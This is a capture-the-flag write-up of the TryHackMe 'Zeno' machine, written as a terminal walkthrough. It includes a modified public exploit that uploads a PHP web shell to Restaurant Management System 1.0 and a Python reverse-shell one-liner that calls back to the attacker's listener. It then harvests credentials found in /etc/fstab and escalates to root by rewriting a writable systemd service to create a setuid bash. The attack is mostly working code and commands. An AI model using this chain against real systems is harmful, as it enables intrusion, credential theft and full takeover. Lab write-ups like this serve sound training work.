Zeno

You can find this machine here : https://tryhackme.com/room/zeno

Port Scan

1 2 3 4 5 6

┌──(kali㉿Zeus)-[~] └─$ sudo nmap -Pn zeno.thm -p- PORT STATE SERVICE 22/tcp open ssh 12340/tcp open unknown

Directory Scan

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18

┌──(kali㉿Zeus)-[~] └─$ gobuster dir -u http://zeno.thm:12340/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowerca =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://zeno.thm:12340/ [+] Method: GET [+] Threads: 40 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: php,txt,bak [+] Timeout: 10s =============================================================== 2022/02/25 20:00:44 Starting gobuster in directory enumeration mode =============================================================== /rms (Status: 301) [Size: 239] [--> http://10.10.190.102:12340/rms/]

Restaurant Management System 1.0 - Remote Code Execution

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

┌──(kali㉿Zeus)-[~/Desktop] └─$ searchsploit Restaurant Management System --------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------------------------- --------------------------------- Restaurant Management System 1.0 - Remote Code Execution | php/webapps/47520.py --------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results ┌──(kali㉿Zeus)-[~/Desktop] └─$ locate php/webapps/47520.py /usr/share/exploitdb/exploits/php/webapps/47520.py ┌──(kali㉿Zeus)-[~/Desktop] └─$ cp /usr/share/exploitdb/exploits/php/webapps/47520.py .

• Modified Script

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46

import requests import sys url = sys.argv[1] if len(sys.argv[1]) < 8: print("[+] Usage : python rms-rce.py http://localhost:80/") exit() print ("[+] Restaurant Management System Exploit, Uploading Shell") target = url+"admin/foods-exec.php" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Length": "327", "Content-Type": "multipart/form-data;boundary=---------------------------191691572411478", "Connection": "close", "Referer": "http://zeno.thm:12340/rms/admin/foods.php", "Cookie": "PHPSESSID=4dmIn4q1pvs4b79", "Upgrade-Insecure-Requests": "1" } data = """ -----------------------------191691572411478 Content-Disposition: form-data; name="photo"; filename="reverse-shell.php" Content-Type: text/html <?php echo shell_exec($_GET["cmd"]); ?> -----------------------------191691572411478 Content-Disposition: form-data; name="Submit" Add -----------------------------191691572411478-- """ r = requests.post(target,verify=False, headers=headers,data=data) print("[+] Shell Uploaded. Please check the URL :"+url+"images/reverse-shell.php")

Upload The Backdoor

1 2 3 4

┌──(kali㉿Zeus)-[~/Desktop] └─$ python3 47520.py http://zeno.thm:12340/rms/ [+] Restaurant Management System Exploit, Uploading Shell [+] Shell Uploaded. Please check the URL :http://zeno.thm:12340/rms/images/reverse-shell.php

Reverse Shell

• Browser

1	http://zeno.thm:12340/rms/images/reverse-shell.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.18.45.56%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22sh%22)%27

• Listener

1 2 3 4 5

┌──(kali㉿Zeus)-[~] └─$ nc -lnvp 4444 listening on [any] 4444 ... connect to [10.18.45.56] from (UNKNOWN) [10.10.190.102] 51022 sh-4.2$

LinPeas

• Found Possible Credentials

1	/etc/fstab:#//10.10.10.10/secret-share /mnt/secret-share cifs _netdev,vers=3.0,ro,username=zeno,password=Frobj<REMOVED>anJa,domain=localdomain,soft 0 0

• Edward Credentials

1	edward : Frobj<REMOVED>anJa

User Owned

Root PrivEsc - Writable Service

1 2 3 4 5

[edward@zeno ~]$ sudo -l User edward may run the following commands on zeno: (ALL) NOPASSWD: /usr/sbin/reboot [edward@zeno ~]$

• Run LinPeas as edward

1 2	/etc/systemd/system/multi-user.target.wants/zeno-monitoring.service /etc/systemd/system/zeno-monitoring.service

• Old zeno-monitoring.service

1 2 3 4 5 6 7 8 9 10

[Unit] Description=Zeno monitoring [Service] Type=simple User=root ExecStart=/root/zeno-monitoring.py [Install] WantedBy=multi-user.target

• New zeno-monitoring.service using vi

1. vi zeno-monitoring.service
2. Go to ExecStart line using arrows
3. Press i for INSERT
4. Replace the /root/zeno-monitoring.py with the /bin/bash -c "cp /bin/bash /home/edward/bash; chmod +s /home/edward/bash"
5. Press ESC 2 or more times
6. Press :x!

1 2 3 4 5 6 7 8 9 10

[Unit] Description=Zeno monitoring [Service] Type=simple User=root ExecStart=/bin/bash -c "cp /bin/bash /home/edward/bash; chmod +s /home/edward/bash" [Install] WantedBy=multi-user.target

Root Owned

Resource : https://book.hacktricks.xyz/linux-unix/privilege-escalation#cron-path

1	[edward@zeno system]$ sudo -u root /usr/sbin/reboot